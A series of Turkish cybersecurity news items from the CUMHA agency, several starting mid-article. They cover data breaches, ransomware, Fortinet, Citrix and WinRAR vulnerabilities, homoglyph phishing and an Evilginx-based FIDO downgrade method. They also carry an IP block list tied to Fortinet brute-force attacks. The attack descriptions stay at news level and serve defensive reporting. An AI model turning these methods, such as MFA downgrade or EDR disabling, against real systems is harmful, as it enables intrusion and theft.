Kişisel Verileri Koruma Kurulu, 14 Ağustos 2025 tarihli ve 2025/1481 sayılı kararıyla ihlalin Kurum internet sitesinde ilan edilmesine karar verdi. Konuya ilişkin inceleme sürüyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı 25 Mayıs’ta gerçekleşti
Manulaş Manisa Ulaşım Hizmetleri Makina Sanayi ve Ticaret A.Ş., kişisel verileri etkileyen siber saldırıya ilişkin Kişisel Verileri Koruma Kurumu’na (KVKK) bildirimde bulundu. Açıklamaya göre fidye yazılımı saldırısı 25 Mayıs 2025’te meydana geldi ve aynı gün tespit edildi.

1,2 milyon kayıtta risk tespit edildi
Şirket tarafından yapılan bildirimde, 1 milyon 268 bin 222 kayıt üzerinde ihlal gerçekleştiği, sistemde çok sayıda mükerrer veri bulunduğu için gerçek kişi sayısının daha az olabileceği aktarıldı.

Kapsamlı veri grupları etkilendi
Saldırıdan etkilenen kişisel veriler arasında ad, soyad, T.C. kimlik numarası, doğum tarihi, cinsiyet, telefon numarası, e-posta adresi, açık adres, meslek bilgisi, plaka numarası, fotoğraf ve sağlık bilgileri (engellilik durumu ve oranı) yer aldı. Etkilenen grupların aboneler ve üyeler olduğu bildirildi.

İnceleme devam ediyor
Verilerin dışarıya aktarılıp aktarılmadığı henüz tespit edilemezken, Kişisel Verileri Koruma Kurulu’nun 3 Haziran 2025 tarihli ve 2025/999 sayılı kararıyla ihlalin kamuoyuna duyurulması kararlaştırıldı.

Vatandaşların başvuru kanalları
İhlalden etkilenen kişiler, Manulaş’ın web sitesi (https://manulas.com.tr/), 0 236 232 19 00 numaralı telefon hattı veya info@manulas.com.tr e-posta adresi üzerinden bilgi alabilecek.

Kaynak: CUMHA - CUMHUR HABER AJANSI

PowerShell 2.0, 2009’da Windows 7 ile birlikte tanıtılmış ve uzun süre sistem yönetiminde yaygın olarak kullanılmıştı. Ancak güvenlik zafiyetleri, modern özelliklerin eksikliği ve bakım yükü nedeniyle yıllardır sadece “isteğe bağlı özellik” olarak tutuluyordu.

Etkilenen Kullanıcılar
Microsoft, modern sürümler olan PowerShell 5.1 ve PowerShell 7’nin desteğinin devam ettiğini, dolayısıyla çoğu kullanıcı için bir sorun yaşanmayacağını açıkladı. Ancak PowerShell 2.0’a bağımlı eski uygulamalar ve betikler kullanan müşterilerin doğrudan etkileneceği bildirildi.

Şirket, eski Microsoft ürünleri (Exchange, SharePoint, SQL Server gibi) ve bazı üçüncü taraf yazılımların hâlâ PowerShell 2.0’a ihtiyaç duyabileceğini, bu nedenle kullanıcıların sistemlerini uyarlamaları gerektiğini vurguladı.

Geriye Dönük Uyum ve Öneriler
PowerShell 2.0 çalıştırmaya çalışan betikler varsayılan olarak PowerShell 5.1’e yönlendirilecek. Çoğu komut ve modül geriye dönük uyumlulukla çalışsa da Microsoft, kullanıcıların eski betiklerini güncellemeleri ve PowerShell 7’ye geçiş yapmalarını tavsiye ediyor.

Microsoft’un açıklamasında, “Desteklenen ve güncel PowerShell sürümlerini kullanarak betiklerinizin daha güvenli çalışmasını sağlayabilirsiniz. PowerShell 2.0’a bağımlı yazılım ve betiklerinizi güncellemeniz veya geçici çözümlerle uyarlamanız gerekmektedir” ifadeleri yer aldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Ne oldu, ne etkiledi
Kurum, kamuya açık bir atıf yapmadı; herhangi bir tehdit grubu işaret edilmedi. Ancak etki alanının genişliği ve hizmet kesintilerinin süresi, fidye yazılımı ihtimalini güçlendirdi. Olay sırasında ofis personelinin çalışmalarını sürdürdüğü ve kesintilerin en aza indirilmesi için yöneticilerle koordinasyon sağlandığı bildirildi.

Olası giriş vektörü
Saldırı vektörü resmen açıklanmadı. Bununla birlikte siber güvenlik uzmanı Kevin Beaumont, yaklaşık bir ay önce Pennsylvania Başsavcılık ağı üzerinde internetten erişilen bazı Citrix NetScaler cihazlarının kritik CVE-2025-5777 (Citrix Bleed 2) açığına karşı savunmasız olduğunu tespit etmişti. Paylaşılan Shodan bulgularına göre iki cihazdan biri 29 Temmuz’dan, diğeri 7 Ağustos’tan bu yana çevrimdışı durumda.

Genişleyen risk tablosu
Shadowserver Foundation, pazartesi günü 3.300’ün üzerinde NetScaler cihazının hâlâ CVE-2025-5777’ye karşı savunmasız olduğunu rapor etti. Hollanda Ulusal Siber Güvenlik Merkezi (NCSC), en az Mayıs başından beri bu açığın sıfır gün olarak kritik kuruluşlara karşı kullanıldığını bildirdi. Hollanda Savcılık Kurumu (Openbaar Ministerie) 18 Temmuz’da e-posta sunucularını etkileyen bir ihlali açıklamıştı.

Resmî uyarılar ve yükümlülükler
CISA, söz konusu Citrix açığını “Bilinen İstismar Edilen Zafiyetler” kataloğuna ekleyerek federal kurumlara acil yama yükümlülüğü getirdi. Kurumlar için öneriler; hızla yamalama, etkilenen cihazların internetten erişimini sınırlama ve olağandışı kimlik doğrulama aktivitelerine karşı izleme olarak sıralanıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Söz konusu değişim, saldırganların ya aynı altyapıyı kullanarak farklı Fortinet ürünlerini hedef aldığını ya da kullandıkları araçların yeni hedeflere adapte edildiğini gösteriyor. GreyNoise, bu tür saldırıların genellikle yeni güvenlik açıklarının açıklanmasından yaklaşık altı hafta önce tespit edildiğini ve istismar girişimlerinin kısa sürede başlayabileceğini vurguladı.

Tespit Edilen Faaliyetler
GreyNoise’un analizine göre, 3 Ağustos’taki saldırı trafiği daha önce Haziran ayında Pilot Fiber Inc. ile ilişkili bir FortiGate cihazından kaydedilen etkinliklerle benzerlik gösterdi. Bu durum, aynı araçların veya altyapının tekrar kullanım ihtimaline işaret ediyor.

5 Ağustos’tan itibaren ise trafik SSL VPN yerine FortiManager’a yöneldi. GreyNoise, bunun sadece araştırmacıların yaptığı geniş kapsamlı taramalardan farklı olduğunu, doğrudan yetkisiz erişim denemelerine işaret eden kaba kuvvet saldırıları olduğunu belirtti.

Engellenmesi Gereken IP Adresleri
Rapor kapsamında aşağıdaki IP adresleri saldırılarla ilişkilendirildi ve güvenlik duvarlarında engellenmesi tavsiye edildi:

• 31.206.51.194

• 23.120.100.230

• 96.67.212.83

• 104.129.137.162

• 118.97.151.34

• 180.254.147.16

• 20.207.197.237

• 180.254.155.227

• 185.77.225.174

• 45.227.254.113

Uzmanlardan Uyarılar
GreyNoise, yöneticilere Fortinet cihazlarında oturum açma korumalarını güçlendirmeleri, dış erişimleri yalnızca güvenilir IP aralıkları ve VPN üzerinden sınırlamaları çağrısında bulundu.

Siber güvenlik uzmanları, kaba kuvvet saldırılarındaki bu artışın, Fortinet ürünlerinde henüz açıklanmamış sıfır gün açıklarının duyurulmadan önce test edilmesi ihtimaline dikkat çekiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırının İşleyişi
Araştırmacılar, Evilginx adlı AiTM (adversary-in-the-middle) çerçevesine özel bir “phishlet” ekleyerek Safari’nin Windows sürümünü taklit eden bir kullanıcı aracısı oluşturdu. Bu tarayıcı FIDO tabanlı kimlik doğrulamasını desteklemediği için Microsoft Entra ID, kullanıcıya hata mesajı gösteriyor ve alternatif yöntemler (Microsoft Authenticator uygulaması, SMS kodu, OTP vb.) sunuyor.

Kullanıcı bu yöntemlerden biriyle giriş yaptığında, saldırı platformu hem kullanıcı adı/parolayı hem de çok faktörlü doğrulama (MFA) tokenini veya oturum çerezini ele geçiriyor. Bu çerez saldırganın tarayıcısına aktarıldığında, kurbanın hesabına tam erişim sağlanabiliyor.

Henüz Saldırılarda Görülmedi
Proofpoint, yöntemin şu ana kadar gerçek saldırılarda kullanılmadığını ancak özellikle yüksek değerli hedeflere yönelik operasyonlarda ciddi risk oluşturduğunu belirtti.

Microsoft, araştırma hakkında yaptığı açıklamada bunun bir ürün açığı olmadığını, sosyal mühendislik yoluyla gerçekleştirilen bir oltalama tekniği olduğunu vurguladı. Şirket, kullanıcıların kimlik doğrulama gücü politikalarıyla daha güçlü yöntemleri zorunlu hale getirmesini ve şüpheli bağlantılara tıklamaktan kaçınmasını önerdi.

Önlemler
Uzmanlar, kullanıcıların beklenmedik şekilde alternatif kimlik doğrulama seçenekleriyle karşılaşmaları halinde işlemi durdurmaları gerektiğini söylüyor. Ayrıca, fallback doğrulama yöntemlerinin kapatılması veya ek güvenlik kontrollerinin devreye alınması öneriliyor.

Geçtiğimiz ay farklı bir FIDO zayıflatma saldırısı da rapor edilmişti. Expel araştırmacıları tarafından geliştirilen “PoisonSeed” adlı yöntemde kullanıcılar sahte bir QR kod aracılığıyla kandırılmaya çalışılmış, ancak pratikte saldırı başarısız olmuştu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

FortiSIEM; kamu kurumları, büyük ölçekli işletmeler, finans kuruluşları, sağlık sektörü ve yönetilen güvenlik hizmet sağlayıcıları (MSSP) tarafından yaygın olarak kullanılıyor. Açığın etki alanı 5.4 sürümünden 7.3 sürümüne kadar uzanıyor.

Fortinet’ten Kritik Uyarı
Fortinet, açığın aktif olarak kullanıldığını doğruladı. Açıklamada, “Bu güvenlik açığı için pratik istismar kodunun dolaşımda olduğu tespit edilmiştir” ifadesine yer verildi. Ayrıca istismarın cihazda ayırt edici bir gösterge (IOC) bırakmadığı, dolayısıyla tespitinin zor olduğu belirtildi.

Şirket, güvenlik güncellemesi yayımlanan sürümlere acilen geçilmesi gerektiğini bildirdi:

• FortiSIEM 7.3.2

• FortiSIEM 7.2.6

• FortiSIEM 7.1.8

• FortiSIEM 7.0.4

• FortiSIEM 6.7.10

5.4 ile 6.6 arasındaki eski sürümler için yama yayımlanmayacağı, bu sürümlerin kullanıcılarının desteklenen sürümlere geçmesi gerektiği açıklandı.

Geçici Çözüm ve Önlemler
Fortinet, phMonitor bileşeninin 7900 numaralı portuna erişimi kısıtlamanın geçici bir önlem olabileceğini bildirdi. Ancak bunun yalnızca saldırı yüzeyini daralttığı, açığın kendisini ortadan kaldırmadığı vurgulandı.

Açıklama, GreyNoise’un bu ayın başında Fortinet SSL VPN’lerine yönelik kaba kuvvet saldırılarında büyük artış gözlemlendiğini ve daha sonra FortiManager’a yönelim olduğunu rapor etmesinin hemen ardından geldi. Güvenlik uzmanları bu tür trafik artışlarının çoğu zaman yeni bir güvenlik açığının habercisi olabileceğini ifade ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

CISA’nın açıklamasına göre, CVE-2025-8875 olarak izlenen açık güvenliksiz serileştirme üzerinden komut çalıştırmaya, CVE-2025-8876 ise kullanıcı girdisinin hatalı filtrelenmesiyle komut enjeksiyonuna olanak tanıyor.

N-able’dan Açıklama ve Yama
N-able, açıkların istismar edildiğini doğrulayarak güvenlik güncellemelerinin N-central 2025.3.1 sürümüyle yayımlandığını bildirdi. Şirket, saldırıların sınırlı sayıda on-premises ortamda gözlemlendiğini, ancak bulut tabanlı sistemlerde bir bulguya rastlanmadığını açıkladı.

Şirketin duyurusunda, “On-premises N-central kullananların vakit kaybetmeden 2025.3.1 sürümüne yükseltmesi gerekmektedir. Güvenlik politikamız gereği CVE ayrıntıları güncellemeden üç hafta sonra paylaşılacaktır” ifadelerine yer verildi.

Federal Kurumlara Son Tarih 20 Ağustos
CISA, söz konusu açıkları “Bilinen İstismar Edilen Açıklar Kataloğu”na ekleyerek Federal Civilian Executive Branch kurumlarının 20 Ağustos’a kadar sistemlerini yamalamasını zorunlu kıldı. 2021’de yürürlüğe giren Bağlayıcı Operasyonel Direktif (BOD) 22-01 çerçevesinde belirlenen süreye uymayan kurumlar ciddi risklerle karşı karşıya kalabilecek.

Shodan verilerine göre, çevrimiçi olarak erişilebilir yaklaşık 2.000 N-able N-central örneği bulunuyor. Bunların büyük kısmı ABD, Avustralya ve Almanya’da yer alıyor.

CISA ayrıca özel sektör dahil tüm kuruluşlara da güncellemeleri önceliklendirmeleri yönünde çağrı yaptı. Açıklamada, “Bu tür açıklar kötü niyetli aktörler için sık kullanılan saldırı vektörleri olup federal ağlar için ciddi riskler oluşturmaktadır” denildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Söz konusu saldırıda, Microsoft yazılımlarında bulunan güvenlik açığının istismar edilerek Avam Kamarası bilgisayar ve mobil cihazlarını yöneten bir veritabanına sızıldığı belirtildi. Saldırı sırasında çalışanlara ait kamuya açık olmayan veriler de çalındı. Bu veriler arasında isimler, görev unvanları, ofis konumları ve e-posta adresleri yer alıyor.

Dolandırıcılık Uyarısı
Avam Kamarası üyeleri ve çalışanları, çalınan verilerin kimlik sahteciliği ya da dolandırıcılık amaçlı kullanılabileceği konusunda uyarıldı.

Kanada İletişim Güvenliği Kurumu’na (CSE) bağlı Kanada Siber Güvenlik Merkezi (Cyber Centre), soruşturmaya destek verdiğini açıkladı. Kurum tarafından yapılan açıklamada, saldırının belirli bir tehdit grubu veya devlet destekli aktörlerle ilişkilendirilmediği, siber olaylarda failleri tespit etmenin zaman ve kaynak gerektirdiği vurgulandı.

Microsoft Açıkları Ön Planda
Her ne kadar saldırıda kullanılan açık hakkında resmi açıklama yapılmasa da, Kanada Siber Merkezi kısa süre önce iki Microsoft güvenlik açığı konusunda ülke genelinde uyarıda bulunmuştu. Bunlardan biri SharePoint Server’daki CVE-2025-53770 (ToolShell) olarak bilinen açık, diğeri ise Exchange sunucularını etkileyen CVE-2025-53786.

ToolShell açığı Temmuz ayından bu yana Çin destekli gruplar ve fidye yazılım çeteleri tarafından aktif olarak kullanılıyor. Bu açık aracılığıyla ABD Ulusal Nükleer Güvenlik İdaresi, Eğitim Bakanlığı, Florida Gelir İdaresi, Rhode Island Genel Meclisi ve Avrupa ile Orta Doğu’daki bazı devlet kurumlarının hedef alındığı biliniyor.

CVE-2025-53786 ise Microsoft Exchange ortamlarında saldırganlara ağ içinde yatay hareket etme imkânı tanıyor. ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) geçtiğimiz hafta bu açık için acil direktif yayımlamıştı.

Güvenlik uzmanları, Kanada’daki kurumların vakit kaybetmeden sistemlerini güncellemeleri gerektiğini, aksi halde benzer saldırılarla karşı karşıya kalınabileceğini belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İlk bakışta Booking.com’un resmi adreslerine benziyormuş gibi görünen bu bağlantılar, kullanıcıları sahte alan adlarına yönlendiriyor. Örneğin, “https://account.booking.comんdetailんrestric-access.www-account-booking.com/en/” şeklinde görünen link, aslında www-account-booking[.]com adlı sahte bir domaine ait.

Zararlı Yazılım Dağıtımı
Kullanıcılar bu bağlantıya tıkladığında zararlı bir MSI dosyası indirilerek bilgisayara yükleniyor. Güvenlik araştırmaları, indirilen dosyanın bilgi hırsızları veya uzaktan erişim trojanları gibi ek kötü amaçlı yazılımlar kurmak için kullanıldığını ortaya koydu.

Bu yöntem, “homoglif” olarak adlandırılan, birbirine çok benzeyen ancak farklı alfabelere ait karakterleri kullanarak yapılan oltalama saldırılarının bir örneği. Benzer teknikler daha önce de Cyrillic ve Latin harfleriyle görülmüştü.

Intuit Kullanıcıları da Hedefte
BleepingComputer tarafından bildirilen ayrı bir saldırıda ise Intuit kullanıcıları hedef alındı. Bu kampanyada “intuit.com” gibi görünen sahte alan adları aslında “Lntuit.com” şeklinde kayıtlı. Küçük harf kullanıldığında “L” harfinin “i” harfine çok benzemesi, kullanıcıların sahte bağlantıyı fark etmesini zorlaştırıyor.

E-postalarda yer alan “Hesabımı doğrula” bağlantısına tıklayan kullanıcılar sahte sitelere yönlendirilirken, bağlantı doğrudan açıldığında ise gerçek Intuit giriş sayfasına geri yönlendiriliyor. Bu yöntemle saldırganların özellikle mobil kullanıcıları hedef aldığı düşünülüyor.

Daha Önce de Booking.com Hedef Alındı
Booking.com markası daha önce de oltalama saldırılarında kullanıldı. 2023’te otel müşterilerinin sahte sitelere yönlendirilerek kredi kartı bilgilerinin çalındığı, 2025’in Mart ayında ise Microsoft’un, konaklama sektörü çalışanlarını hedef alan başka bir oltalama kampanyası konusunda uyarı yaptığı biliniyor.

Uzmanlar, kullanıcıların bağlantılara tıklamadan önce alan adlarını dikkatle incelemesi ve güncel güvenlik yazılımları kullanması gerektiğini belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

PST Başkanı Beate Gangås, Arendal kentinde düzenlenen Arendalsuka ulusal forumunda yaptığı açıklamada olayın doğrudan zarar vermekten çok, Rusya’nın siber yeteneklerini sergilemeye yönelik olduğunu belirtti. Gangås, “Amaçları yıkım yaratmak değil, neler yapabileceklerini göstermek” ifadelerini kullandı. Ayrıca bu tür eylemlerin toplumda korku ve huzursuzluk yaratmayı hedeflediğini vurguladı.

Dört Saatlik Müdahale
Yerel basına göre baraj operatörleri yaklaşık dört saat içinde saldırıyı fark ederek vanaları yeniden kapattı. Bu süre zarfında 7,2 milyon litreden fazla su tahliye oldu.

Haziran ayında Norveç Ulusal Kriminal Soruşturma Servisi (Kripos) de benzer bir sonuca ulaştı. Rus hacker grupları saldırıyı doğrulamak için Telegram üzerinden üç dakikalık bir video yayımladı. Videoda barajın kontrol paneli ve pro-Rus bir siber grubun işaretleri yer aldı.

Rusya ile İlişkilendirilen İkinci Saldırı
Bu olay, Norveç’te Rusya bağlantılı ikinci büyük siber saldırı olarak kayıtlara geçti. Daha önce ülkenin devlet hizmetlerine yönelik geniş çaplı bir DDoS saldırısı düzenlenmişti.

Norveç İstihbarat Şefi Nils Andreas Stensønes, Rusya’nın Batı’ya karşı hibrit saldırılarla gerilimi artırdığını belirterek, “Norveç savaşta değil, ancak Rusya öngörülemez bir komşu ve en büyük tehdit konumunda” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Grubun en erken faaliyetleri 2024 yılının Eylül ayında rapor edilmiş olsa da, saldırılar son dönemde daha gelişmiş yöntemlerle yürütülmeye başlandı. Araştırmacılar, kullanılan teknikler ve araçlar nedeniyle grubun eski fidye yazılım oluşumlarının üyelerinden oluşabileceğini değerlendiriyor.

Saldırı Yöntemleri
Saldırılar, Windows sistemlerinde yönetici hesaplarının etkinleştirilmesi veya yeni yerel hesapların oluşturulmasıyla başlıyor. Daha sonra saldırganlar, sistemde keşif faaliyetleri gerçekleştirerek donanım bilgilerini ve kullanıcı hesaplarını topluyor. Bu süreçte zararlı hizmetler ve görevler tanımlanıyor.

Trend Micro’nun raporuna göre, kullanılan yöntemlerden biri WinMainSvc adlı keylogger hizmeti, diğeri ise MSRuntime adı verilen fidye yazılım yükleyicisi.

EDR Sistemlerini Devre Dışı Bırakan Araç
Crypto24’ün dikkat çeken yöntemlerinden biri, RealBlindingEDR adlı açık kaynak kodlu aracın özelleştirilmiş bir versiyonunun kullanılması. Bu araç, Trend Micro, Kaspersky, Sophos, SentinelOne, Malwarebytes, McAfee, Cisco ve Fortinet gibi birçok güvenlik yazılımını hedef alarak çekirdek düzeyinde devre dışı bırakabiliyor.

Trend Micro ürünlerine yönelik olarak ise saldırganların XBCUninstaller.exe aracını kötüye kullandığı belirtildi. Normal şartlarda sistem sorunlarını gidermek için kullanılan bu araç, saldırı sırasında güvenlik ajanlarını kaldırmak amacıyla çalıştırıldı.

Veri Hırsızlığı ve Şifreleme Süreci
Saldırılar sırasında “Microsoft Help Manager” adıyla gizlenen keylogger aktif pencere başlıklarını ve tuş vuruşlarını kaydediyor. Ayrıca saldırganlar SMB paylaşımları üzerinden ağda yayılım sağlıyor ve çalınan verileri özel bir araçla Google Drive’a aktarıyor.

Son aşamada ise sistemlerdeki gölge kopyalar silinerek fidye yazılımı devreye sokuluyor. Trend Micro, şifreleme yöntemleri veya fidye notları hakkında ayrıntılı bilgi paylaşmazken, savunma ekiplerine yönelik göstergeler listesi yayımladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dizin geçişi (directory traversal) hatasından kaynaklanan bu açık, özel hazırlanmış RAR arşivlerinin, kullanıcı tarafından belirtilen dizin yerine saldırganın tanımladığı bir konuma dosya çıkartmasına izin veriyor. Bu yöntemle, zararlı çalıştırılabilir dosyalar Windows’un başlangıç klasörlerine (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup veya %ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp) yerleştirilebiliyor. Kullanıcı bir sonraki oturum açtığında, bu dosyalar otomatik olarak çalışarak saldırgana sistem üzerinde uzaktan kod çalıştırma imkânı sağlıyor.

ESET, saldırılarda hedefli oltalama e-postalarıyla gönderilen RAR dosyalarının bu açığı kullanarak RomCom arka kapı zararlı yazılımını yüklediğini belirledi. RomCom (Storm-0978, Tropical Scorpius veya UNC2596 olarak da bilinir) Rusya bağlantılı bir tehdit grubu olup fidye yazılımı, veri hırsızlığı ve kimlik bilgisi toplama kampanyalarıyla tanınıyor. Grup daha önce Cuba ve Industrial Spy fidye yazılım operasyonlarıyla ilişkilendirilmişti.

WinRAR otomatik güncelleme özelliği sunmadığından, tüm kullanıcıların win-rar.com adresinden en son sürümü manuel olarak indirmesi öneriliyor. ESET, açığın istismarına dair detaylı bir raporu daha sonra yayımlayacağını açıkladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Google’ın açıklamasına göre, ihlal edilen sistemde işletme adları, iletişim bilgileri ve ilgili notlar bulunuyordu. Erişim, sınırlı bir zaman diliminde sağlandıktan sonra engellendi. Şirket, verilerin çoğunun zaten kamuya açık olabilecek temel iş bilgileri olduğunu vurguladı.

ShinyHunters grubu, saldırılarda çalışanları hedef alan sesli kimlik avı (vishing) ve sosyal mühendislik yöntemleriyle Salesforce hesaplarına erişim sağlıyor. Bu yöntemle müşteri veritabanlarını indirip şirketlerden fidye talep ediyor. Grup, fidye ödemeyen şirketlerin verilerini sızdırma veya satma tehdidinde bulunuyor.

BleepingComputer’a konuşan ShinyHunters, birçok Salesforce ortamını ihlal ettiklerini ve saldırıların hâlen devam ettiğini doğruladı. Grup, bazı şirketleri e-posta yoluyla şantaj yaparken, bir şirketin verilerini sızdırmamak için 4 Bitcoin (yaklaşık 400 bin dolar) ödediği öğrenildi.

ShinyHunters, geçmişte PowerSchool, Oracle Cloud, Snowflake, AT&T, NitroPDF, Wattpad ve MathWay gibi birçok kurumun veri ihlallerinden sorumlu tutulmuştu.

Bu saldırılardan etkilenen diğer şirketler arasında Adidas, Qantas, Allianz Life, Cisco ve LVMH bünyesindeki Louis Vuitton, Dior ile Tiffany & Co. da yer alıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ControlVault, parolalar, biyometrik veriler ve güvenlik kodlarını anakart üzerindeki Unified Security Hub (USH) modülünde saklıyor. Ancak CVE-2025-24311, CVE-2025-25050 (out-of-bounds), CVE-2025-25215 (arbitrary free), CVE-2025-24922 (stack overflow) ve CVE-2025-24919 (güvensiz serileştirme) gibi açıklar zincirlenerek, saldırganların bellenimde keyfi kod çalıştırmasına imkân tanıyor.

Cisco Talos’a göre, fiziksel erişimi olan bir saldırgan cihazı açarak özel bir USB konnektörüyle USH modülüne doğrudan erişebilir. Bu yöntem, Windows oturum açma bilgisi veya tam disk şifreleme parolası olmadan açıkların istismar edilmesini mümkün kılıyor. Başarılı istismar, yönetici yetkisi kazanmayı, Windows oturumunu atlamayı ve parmak izi doğrulamasını manipüle ederek herhangi bir parmak izini kabul ettirmeyi sağlayabiliyor.

Dell, Mart–Mayıs 2025 döneminde ControlVault3 sürücüsü ve bellenimi için güvenlik güncellemeleri yayımladı. Etkilenen modellerin tam listesi Dell’in güvenlik duyurusunda yer alıyor.

Cisco Talos, kullanıcıların sistemlerini Windows Update veya Dell’in resmi sitesinden güncel tutmalarını, kullanılmayan parmak izi okuyucu, akıllı kart okuyucu ve NFC gibi güvenlik donanımlarını devre dışı bırakmalarını öneriyor. Yüksek riskli ortamlarda parmak iziyle giriş özelliğinin kapatılması, BIOS üzerinden kasa açılma algılamanın (chassis intrusion detection) etkinleştirilmesi ve Windows’ta Gelişmiş Oturum Açma Güvenliği’nin (ESS) devreye alınması da tavsiye ediliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Bu kart, grubun oluşturulma tarihi, üye sayısı, potansiyel dolandırıcılık uyarıları ve grup davetlerini nasıl kontrol edebileceğinize dair bilgiler içeriyor. Kullanıcılar, sohbeti hiç açmadan gruptan ayrılabilecek ya da bilgileri inceledikten sonra sohbete girerek bağlamı görebilecek. Bu süre zarfında grup bildirimleri sessize alınacak.

Uygulama ayrıca, kişi listenizde olmayan bir numaradan mesaj aldığınızda, gönderen hakkında ek bilgi vererek dikkatli olmanız konusunda uyarı yapacak. WhatsApp, “Bilinmeyen bir numaradan gelen, hızlı kazanç vaat eden veya olağandışı bir mesaj aldığınızda duraklayın, sorgulayın ve doğrulayın” tavsiyesinde bulundu.

Şirket, 2025’in ilk altı ayında kullanıcılarını hedef alan dolandırıcılık merkezleriyle bağlantılı 6,8 milyondan fazla hesabı devre dışı bıraktığını açıkladı. Yılın başında ise OpenAI ile iş birliği yaparak Kamboçya’da faaliyet gösteren bir dolandırıcılık merkezini kapattı. Bu merkez; kripto para yatırımı vaadi, sahte beğeni satışı ve kiralık scooter üzerinden yürütülen piramit şemaları gibi yöntemler kullanıyordu.

WhatsApp, Nisan ayında da özel sohbetlerde ve grup konuşmalarında paylaşılan hassas bilgileri korumak için Gelişmiş Sohbet Gizliliği (Advanced Chat Privacy) özelliğini devreye almıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Bu açık, kimlik doğrulaması gerekmeksizin saldırganların sistemde uzaktan rastgele kod çalıştırmasına imkân veriyor. Şirket, güvenlik yamasının henüz hazır olmadığını, ancak istismarı engellemek için kısa vadeli koruma sağlayan bir geçici önlem aracının yayımlandığını açıkladı.

Geçici çözüm, bilinen tüm istismar yöntemlerine karşı koruma sağlasa da, Remote Install Agent fonksiyonunu devre dışı bırakıyor. Bu nedenle yöneticiler, güvenlik yaması yayımlanana kadar uzak ajan kurulumlarını kullanamayacak.

Trend Micro, güvenlik güncellemesinin 2025 Ağustos ortasında yayımlanacağını ve bu yamayla birlikte devre dışı bırakılan işlevin geri geleceğini belirtti. Şirket, özellikle yönetim konsolunun IP adresini internete açık tutan kullanıcıların, erişimi kısıtlayacak önlemleri derhal uygulamasını tavsiye etti.

Japonya Ulusal Bilgisayar Acil Müdahale Ekibi (JPCERT) de güvenlik açığı için uyarı yayımlayarak kullanıcıları en kısa sürede geçici mitigasyonları uygulamaya çağırdı.

Trend Micro geçmişte de Apex One’daki sıfırıncı gün açıklarını kapatmış, Eylül 2022’de CVE-2022-40139 ve Eylül 2023’te CVE-2023-41179 güvenlik açıklarını yamalamıştı. Şirket, bu ayın başında ise Apex Central ve Endpoint Encryption (TMEE) PolicyServer ürünlerindeki kritik yetki atlatma ve uzaktan kod çalıştırma açıklarını gidermişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Araştırmacılar bu dönemde 1.469 geçerli güvenlik açığı raporu sundu. En yüksek ödül 200 bin dolar olurken, raporlar Azure, Microsoft 365, Dynamics 365, Power Platform, Windows, Edge ve Xbox gibi ürünlerde 1.000’den fazla potansiyel güvenlik açığının giderilmesine katkı sağladı.

Microsoft, bağımsız araştırmacıların özellikle yapay zeka gibi hızla gelişen alanlarda yüksek etkili güvenlik açıklarını bulmasının, yeni tehditlerin önünde olunmasına yardımcı olduğunu belirtti. Şirket, Koordine Edilmiş Güvenlik Açığı Bildirimi (Coordinated Vulnerability Disclosure) sürecinin kullanıcı güvenini güçlendirdiğini vurguladı.

Bu yıl Microsoft, Copilot AI, Defender ürünleri ve çeşitli kimlik yönetim sistemlerini kapsayan bounty programlarını genişletti. Copilot programına geleneksel çevrimiçi hizmet açıkları eklendi, Dynamics 365 ve Power Platform’a yeni bir yapay zeka kategorisi dahil edildi. Windows programına ise uzaktan hizmet reddi (DoS) ve yerel sandbox kaçış senaryoları ödülleri eklendi.

Kimlik doğrulama programı artık daha fazla API ve alan adını kapsarken, Defender programı Microsoft Defender for Identity (MDI), Microsoft Defender for Office (MDO) ve Microsoft Defender for Cloud Applications (MDA) ürünlerini de içeriyor.

Şirket, son dönemde orta seviye Microsoft Copilot güvenlik açıkları için ödülleri artırdı, bazı .NET ve ASP.NET Core açıkları için 40 bin dolara kadar ödeme yapacağını açıkladı. Ayrıca Power Platform ve Dynamics 365 AI açıkları için ödüller yükseltildi.

Microsoft, bu hafta başında 2025 Zero Day Quest yarışmasında toplam 5 milyon dolara kadar ödül dağıtacağını da duyurdu. Şirket, etkinliği “tarihin en büyük hacking organizasyonu” olarak tanımlıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Forbes’un haberine göre, saldırıda yalnızca müşteri isimleri, doğum tarihleri ve e-posta adresleri ele geçirildi. Parolalar, kimlik bilgileri veya finansal verilerin etkilenmediği açıklandı. BleepingComputer, verilerin Pandora’nın Salesforce veritabanından çalındığını öğrendi.

En az Ocak 2025’ten beri devam eden saldırı dalgasında, tehdit aktörleri sosyal mühendislik ve kimlik avı yöntemleriyle çalışanların Salesforce giriş bilgilerini çalıyor veya kötü amaçlı OAuth uygulamalarına yetki verilmesini sağlıyor. Bu erişimle şirketlerin Salesforce veritabanları indirilip fidye talebiyle şantaj yapılıyor.

ShinyHunters grubu, şirketleri özel olarak fidye talepleriyle tehdit ettiklerini ve ödeme yapılmaması halinde verilerin toplu satışını veya sızdırılmasını planladıklarını doğruladı. Grup, Snowflake veri hırsızlığı saldırılarında da benzer yöntemler kullanmıştı.

Salesforce ise kendi platformunun saldırıya uğramadığını, olayların bilinen bir güvenlik açığından kaynaklanmadığını belirterek, tüm müşterilere çok faktörlü kimlik doğrulama (MFA) kullanmaları, en az ayrıcalık ilkesini uygulamaları ve bağlı uygulamaları dikkatle yönetmeleri yönünde uyarıda bulundu.

